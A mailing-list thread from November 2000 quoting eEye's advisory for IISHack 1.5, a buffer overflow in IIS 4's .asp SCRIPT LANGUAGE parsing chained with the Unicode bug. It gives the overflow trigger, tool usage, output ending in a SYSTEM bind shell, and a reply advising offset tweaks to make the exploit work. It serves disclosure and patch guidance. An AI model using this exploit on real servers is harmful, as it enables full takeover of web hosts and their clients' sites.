Re: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5

[Marc Maiffret <marc () EEYE COM>]

The reason this is happening is because we use a jmp eax from our ole32.dll
version. Your ole32.dll is probably different therefore your jmp eax is
going to be different and if it is different then your not going to be able
to jump back into the exploit code and therefore jmp to random memory and
crash.

So your vulnerable, as you already know, its just a matter of tweaking the
exploit a bit. Like maybe finding a better jmp eax in a dll that is static
throughout more NT4+IIS4 versions.

Note for whowever: So once again if iishack1.5 is causing your server to
crash then your vulnerable, you just need to tweak some offsets to make the
exploit work correctly. View the iishack1.5 source code and go from there.
We might release another version with a better jmp eax location, however
this was for proof of concept not really to hold peoples hands in breaking
servers.

Let me know if you run into any more technical problems.

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com

|-----Original Message-----
|From: Loschiavo, Dave [mailto:DLoschiavo () frcc cc ca us]
|Sent: Sunday, November 05, 2000 6:12 AM
|To: 'Marc Maiffret '; 'PEN-TEST () SECURITYFOCUS COM '
|Subject: RE: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5
|
|
|I am testing this on a IIS 4 box, SP6a no hotfixes, RDS vulnerable, and it
|crashes the www publishing service.
|
|Output is pasted below, as you can see it does appear to run, and the
|exploit asp file is present in the scripts directory, however there is no
|way to connect to the box once the www service crashes.
|
|Also, if I restart the service, leave the exploit in place and then send a
|request through my browser (http://192.168.1.250/scripts/eeyerulez.asp), I
|again crash the service.
|
|>From what I have seen, it works as DoS, but in this configuration, is not
|something that currently works as an exploit to gain access to the box.
|Anyone else get better results?
|
|[paste]
|E:\Program Files\Sploits\iishack1_5>iishack1.5 192.168.1.250 80 6969
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Attempting to find an executable directory...
|Trying directory [scripts]
|Executable directory found. [scripts]
|Path to executable directory is [C:\Inetpub\scripts]
|Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
|Succesfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exeSending the
|exploit...
|Exploit sent! Now telnet to 192.168.1.250 on port 6969 and you should get a
|cmd
|prompt.
|
|
|-----Original Message-----
|From: Marc Maiffret
|To: PEN-TEST () SECURITYFOCUS COM
|Sent: 11/3/00 6:16 AM
|Subject: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5
|
|i know there is not normally advisories here but we thought this might
|be
|something worthwhile for your toolkits.
|
|-----
|IIS ASP $19.95 hack - IISHack 1.5
|
|Release Date:
|November 3rd, 2000
|
|Systems Affected:
|Windows NT 4.0 IIS 4.0 sp6 (vulnerable)
|Windows NT 5.0 IIS 5.0 (not vulnerable)
|
|Description:
|There exists a buffer overflow, that can be exploited to gain SYSTEM
|level
|access, within the IIS (Internet Information Server) .ASP ISAPI file
|parsing
|mechanism.
|
|This is not a remote exploit, it is a local one (However, we will
|explain
|later in the advisory how you _could_ pull this exploit off remotely.).
|It
|is local in the sense that you need to actually create an "evil" .asp
|file
|that when parsed by IIS will cause inetinfo.exe to buffer overflow and
|therefore allow you to take control of the local server as SYSTEM.
|
|So who is affected by this? Any web hosting company or internet service
|provider that is running multiple clients within the same NT4 IIS 4 web
|server. Basically any client (or attacker) who can update their website,
|i.e. upload a new default.asp or anything.asp, can then execute code as
|SYSTEM and therefore take complete control of your server. They could
|then
|do whatever they want to any of the other client websites hosted on that
|NT4
|server. On the other hand they could install sniffers or crack passwords
|to
|further their control of your network.
|
|Hence the title $19.95 hack... Anyone with $20 dollars to spend can
|potentially break into any web hosting company or internet service
|provider
|running NT4+IIS4. Simply buy an account with a web hosting company,
|upload
|your evil.asp and request that evil.asp from your website, I.E.
|http://www.badguy.com/evil.asp, and your executing code on that server
|as
|SYSTEM.
|
|Here is an example .asp file that will cause NT4+IIS4's inetinfo.exe to
|overflow.
|
|----start-cut-of-example.asp----
|<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">
|</SCRIPT>
|----start-cut-of-example.asp----
|
|Where [buffer] is 2220 characters or more. Yes, this overflow is
|exploitable. See section below.
|
|So you don't have $20 dollars to spend, or a server does not host
|websites?
|What then? Well there are going to be situations when a remote attack is
|possible.
|
|An example situation would be a server that has a guest book/message
|board
|system that does not strip out SCRIPT comments when it writes to its
|returned .asp file. So an attacker could go to a web board and within
|the
|"Enter your message here:" box (or whatever) they could simply paste in
|the
|contents of the script language overflow and submit the message. Then
|once
|they requested the .asp file that has that message (the embedded
|overflow
|msg) it would cause IIS to parse that .asp file, overflow, and execute
|their
|code.
|
|On another note you could couple this attack with the recent IIS Unicode
|bug
|to use cmd.exe to echo the contents of your evil.asp to the remote
|system
|then when you request evil.asp your code is executed as SYSTEM. In fact,
|we
|have created a sample exploit to show how this .asp language overflow
|and
|the IIS Unicode exploit could be used together to remotely compromise
|any
|NT4+IIS4+SP6(or lower) system that is behind in installing hot fixes.
|
|Due to the nature of this attack it is likely and quite possible that
|firewalls will not protect you against attacks like this.
|
|The Exploit:
|How to remotely exploit a system? Use the IIS Unicode exploit + .asp
|language overflow.
|For those of you not familiar with the IIS Unicode exploit, it basically
|allows you to remotely execute commands against IIS as IUSR_MACHINE. Now
|since we can execute commands via cmd.exe we could try to make the
|remote
|web server connect out to an FTP server to grab a file (sort of like the
|first IISHack) but you would still be executing code as IUSR_MACHINE.
|The
|way our exploit works is by using the Unicode bug to echo our .asp file
|(complete with shell code, to bind cmd.exe to a port ;-]) to a remote
|server
|and then request that .asp file which then causes inetinfo.exe to
|overflow
|resulting in a SYSTEM privileged cmd.exe to be bound to a specified
|port.
|Now, in most circumstances you should have correct acl's on cmd.exe
|(that
|would not allow IUSR_MACHINE to touch it) as well as some other security
|precautions in place, so we understand this exploit will not work on a
|secured system. However, this is just proof of concept and as most of us
|know, most IIS servers do not have proper local security in place. The
|exploit basically looks like the following when compiled:
|
|C:\we are still hiring good programmers> iishack1.5.exe
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Usage: IISHack1.5 [server] [server-port] [trojan-port]
|
|C:\send resume to hire () eeye com> iishack1.5.exe www.[yourowncompany].com
|80
|6969
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Attempting to find an executable directory...
|Trying directory [scripts]
|Executable directory found. [scripts]
|Path to executable directory is [C:\Inetpub\scripts]
|Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
|Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
|Sending the exploit...
|Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and
|you
|should get a cmd prompt.
|C:\> telnet www.[yourowncompany].com 6969
|Trying www.[yourowncompany].com...
|Microsoft(R) Windows NT(TM)
|(C) Copyright 1985-1996 Microsoft Corp.
|
|C:\WINNT\system32>whoami
|NT AUTHORITY\SYSTEM
|
|Download the full exploit from:
|http://www.eEye.com/html/advisories/IISHack1.5.zip
|
|Vendor Status:
|Microsoft has already fixed this .asp language overflow in prior hot
|fixes
|and applied it to most post service pack 6 hot fixes. This flaw has been
|fixed in the latest versions of W3SVC.DLL. Installing any recent hotfix
|will
|fix the problem.
|Here is a list of _some_ MS advisories and hotfixes that will fix the
|.asp
|language overflow vulnerability:
|MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
|MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
|MS00-057: Patch Available for "File Permission Canonicalization"
|Vulnerability
|MS00-030: Patch Available for "Malformed Extension Data in URL"
|Vulnerability
|MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
|MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
|MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability
|
|W3SVC versions greater than 720 addresses this issue. So if you've been
|keeping up to date with your hot fixes then you should not be vulnerable
|to
|this issue.
|
|Copyright (c) 1998-2000 eEye Digital Security
|Permission is hereby granted for the redistribution of this alert
|electronically. It is not to be edited in any way without express
|consent of
|eEye. If you wish to reprint the whole or any part of this alert in any
|other medium excluding electronic medium, please e-mail alert () eEye com
|for
|permission.
|
|Disclaimer
|The information within this paper may change without notice. Use of this
|information constitutes acceptance for use in an AS IS condition. There
|are
|NO warranties with regard to this information. In no event shall the
|author
|be liable for any damages whatsoever arising out of or in connection
|with
|the use or spread of this information. Any use of this information is at
|the
|user's own risk.
|
|Feedback
|Please send suggestions, updates, and comments to:
|
|eEye Digital Security
|mail:info () eEye com
|http://www.eEye.com
|